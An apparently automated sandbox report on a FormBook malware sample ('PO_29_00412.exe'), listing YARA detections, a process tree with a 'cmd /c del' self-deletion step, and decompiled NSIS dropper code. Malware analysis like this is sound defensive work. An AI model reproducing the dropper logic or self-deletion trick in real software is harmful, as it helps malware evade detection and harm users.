                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: explorer.exe PID: 3388 Parent PID: 5980

                                                                          General

                                                                          Start time:07:55:15
                                                                          Start date:29/04/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:
                                                                          Imagebase:0x7ff714890000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: rundll32.exe PID: 4928 Parent PID: 3388

                                                                          General

                                                                          Start time:07:55:28
                                                                          Start date:29/04/2021
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                          Imagebase:0xe70000
                                                                          File size:61952 bytes
                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: cmd.exe PID: 5540 Parent PID: 4928

                                                                          General

                                                                          Start time:07:55:32
                                                                          Start date:29/04/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Users\user\Desktop\PO_29_00412.exe'
                                                                          Imagebase:0xf80000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 5328 Parent PID: 5540

                                                                          General

                                                                          Start time:07:55:33
                                                                          Start date:29/04/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >

                                                                            Analysis Process: PO_29_00412.exe PID: 5760 Parent PID: 5656 PO_29_00412.exeCOMMON

                                                                            Executed Functions

                                                                            Function 00403461, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t119 = E00406631(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065C3(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\hardz\\Desktop\\PO_29_00412.exe\" ";
				E00406228(_t160, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\hardz\\Desktop\\PO_29_00412.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403430(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403949();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t63 =  *0x42480c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406631(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t153 = E00405BEB(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058AF(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
														}
														E00406228(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\PO_29_00412.exe", 0x41f910, 1) != 0) {
																E00406007(_t137, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t94 = E004058C7(0x41f910);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00406007(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CAE(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403430(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403430(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                            0x00403471
                                                                            0x00403475
                                                                            0x0040347d
                                                                            0x00403481
                                                                            0x00403486
                                                                            0x00403492
                                                                            0x0040349b
                                                                            0x004034a0
                                                                            0x004034a3
                                                                            0x004034aa
                                                                            0x004034b1
                                                                            0x004034b1
                                                                            0x004034aa
                                                                            0x004034b3
                                                                            0x004034b8
                                                                            0x004034b9
                                                                            0x004034c5
                                                                            0x004034c9
                                                                            0x004034cf
                                                                            0x004034dd
                                                                            0x004034e2
                                                                            0x004034e9
                                                                            0x004034ed
                                                                            0x004034f1
                                                                            0x004034f3
                                                                            0x004034f3
                                                                            0x004034f1
                                                                            0x004034fb
                                                                            0x00403502
                                                                            0x00403508
                                                                            0x0040351e
                                                                            0x0040352e
                                                                            0x00403533
                                                                            0x00403539
                                                                            0x00403540
                                                                            0x0040354c
                                                                            0x00403556
                                                                            0x00403558
                                                                            0x0040355a
                                                                            0x0040355f
                                                                            0x0040355f
                                                                            0x0040356f
                                                                            0x00403575
                                                                            0x0040363e
                                                                            0x0040363e
                                                                            0x00403640
                                                                            0x00403642
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040357e
                                                                            0x00403581
                                                                            0x00403589
                                                                            0x00403589
                                                                            0x0040358c
                                                                            0x00403591
                                                                            0x00403593
                                                                            0x00403593
                                                                            0x00403594
                                                                            0x00403594
                                                                            0x00403599
                                                                            0x0040359c
                                                                            0x0040362e
                                                                            0x00403633
                                                                            0x00403638
                                                                            0x0040363b
                                                                            0x0040363d
                                                                            0x0040363d
                                                                            0x0040363d
                                                                            0x00000000
                                                                            0x004035a2
                                                                            0x004035a2
                                                                            0x004035a3
                                                                            0x004035a6
                                                                            0x004035be
                                                                            0x004035e9
                                                                            0x004035eb
                                                                            0x004035fe
                                                                            0x00403629
                                                                            0x0040362c
                                                                            0x0040364a
                                                                            0x0040364d
                                                                            0x00403656
                                                                            0x0040365b
                                                                            0x00403661
                                                                            0x0040366c
                                                                            0x0040366e
                                                                            0x00403673
                                                                            0x00403675
                                                                            0x004036cd
                                                                            0x004036d2
                                                                            0x004036dc
                                                                            0x004036e3
                                                                            0x004036e7
                                                                            0x0040377b
                                                                            0x0040377b
                                                                            0x00403780
                                                                            0x00403786
                                                                            0x0040378b
                                                                            0x004038af
                                                                            0x004038b5
                                                                            0x00403931
                                                                            0x00403931
                                                                            0x00403936
                                                                            0x00403939
                                                                            0x0040393b
                                                                            0x0040393b
                                                                            0x00403943
                                                                            0x00403943
                                                                            0x004038c5
                                                                            0x004038cd
                                                                            0x004038cf
                                                                            0x004038d0
                                                                            0x004038dd
                                                                            0x004038f0
                                                                            0x004038f8
                                                                            0x004038fc
                                                                            0x004038fc
                                                                            0x00403904
                                                                            0x00403909
                                                                            0x00403910
                                                                            0x0040391e
                                                                            0x00403920
                                                                            0x00403926
                                                                            0x00403928
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403912
                                                                            0x00403918
                                                                            0x0040391a
                                                                            0x0040391c
                                                                            0x0040392a
                                                                            0x0040392c
                                                                            0x00000000
                                                                            0x0040392c
                                                                            0x00000000
                                                                            0x0040391c
                                                                            0x00403910
                                                                            0x0040379a
                                                                            0x004037a1
                                                                            0x004037a1
                                                                            0x004036f3
                                                                            0x0040376b
                                                                            0x0040376b
                                                                            0x00403777
                                                                            0x00000000
                                                                            0x00403777
                                                                            0x004036fc
                                                                            0x00403700
                                                                            0x00403736
                                                                            0x00403736
                                                                            0x00403738
                                                                            0x00403740
                                                                            0x004037b2
                                                                            0x004037b4
                                                                            0x004037bb
                                                                            0x004037c3
                                                                            0x004037c3
                                                                            0x004037ce
                                                                            0x004037d3
                                                                            0x004037e2
                                                                            0x004037e6
                                                                            0x004037e7
                                                                            0x004037f0
                                                                            0x004037e9
                                                                            0x004037e9
                                                                            0x004037e9
                                                                            0x004037f6
                                                                            0x004037fc
                                                                            0x00403802
                                                                            0x0040380a
                                                                            0x0040380a
                                                                            0x00403818
                                                                            0x0040381d
                                                                            0x0040382f
                                                                            0x00403837
                                                                            0x0040383d
                                                                            0x00403849
                                                                            0x0040384f
                                                                            0x00403859
                                                                            0x0040386f
                                                                            0x00403880
                                                                            0x00403886
                                                                            0x0040388d
                                                                            0x00403890
                                                                            0x00403896
                                                                            0x00403896
                                                                            0x0040388d
                                                                            0x0040389a
                                                                            0x004038a0
                                                                            0x004038a0
                                                                            0x004038a5
                                                                            0x004038a5
                                                                            0x00000000
                                                                            0x004037e2
                                                                            0x00403742
                                                                            0x00403744
                                                                            0x0040374f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403757
                                                                            0x00403762
                                                                            0x00403767
                                                                            0x00000000
                                                                            0x00403767
                                                                            0x0040372b
                                                                            0x0040372d
                                                                            0x00403731
                                                                            0x00403734
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403734
                                                                            0x00000000
                                                                            0x0040372d
                                                                            0x0040367d
                                                                            0x00403689
                                                                            0x0040368e
                                                                            0x00403693
                                                                            0x00403695
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040369d
                                                                            0x004036a5
                                                                            0x004036b6
                                                                            0x004036be
                                                                            0x004036c0
                                                                            0x004036c5
                                                                            0x004036c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036c7
                                                                            0x00000000
                                                                            0x0040362c
                                                                            0x004035ed
                                                                            0x004035f0
                                                                            0x004035f3
                                                                            0x004035f9
                                                                            0x004035f9
                                                                            0x004035f9
                                                                            0x004035f9
                                                                            0x00000000
                                                                            0x004035f9
                                                                            0x004035f5
                                                                            0x004035f7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004035f7
                                                                            0x004035a8
                                                                            0x004035ab
                                                                            0x004035ae
                                                                            0x004035b4
                                                                            0x004035b4
                                                                            0x00000000
                                                                            0x004035b4
                                                                            0x004035b0
                                                                            0x004035b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004035b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403583
                                                                            0x00403583
                                                                            0x00403583
                                                                            0x00403584
                                                                            0x00403584
                                                                            0x00000000
                                                                            0x00403583
                                                                            0x00000000

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 00403486
                                                                            • GetVersion.KERNEL32 ref: 0040348C
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                                                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                                                                            • OleInitialize.OLE32(00000000), ref: 00403502
                                                                            • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                                                                            • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO_29_00412.exe" ,00000020,"C:\Users\user\Desktop\PO_29_00412.exe" ,00000000,?,00000007,00000009,0000000B), ref: 0040356F
                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040366C
                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040369D
                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                                                                            • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                                                              • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                              • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                                                              • Part of subcall function 00403A3B: GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_29_00412.exe" ,00000000), ref: 00403A55
                                                                              • Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,74B5FA90), ref: 00403B2B
                                                                              • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                                              • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                                                              • Part of subcall function 00403A3B: LoadImageA.USER32 ref: 00403B92
                                                                              • Part of subcall function 00403A3B: RegisterClassA.USER32 ref: 00403BCF
                                                                              • Part of subcall function 00403949: CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                                                              • Part of subcall function 00403949: CloseHandle.KERNEL32(000002B8,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                                                            • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403780
                                                                            • ExitProcess.KERNEL32 ref: 004037A1
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                                                                            • ExitProcess.KERNEL32 ref: 00403943
                                                                              • Part of subcall function 00405944: MessageBoxIndirectA.USER32(0040A230), ref: 0040599F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                                            • String ID: "$"C:\Users\user\Desktop\PO_29_00412.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO_29_00412.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 2181712934-2086024193
                                                                            • Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                                                            • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                                                                            • Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                                                            • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
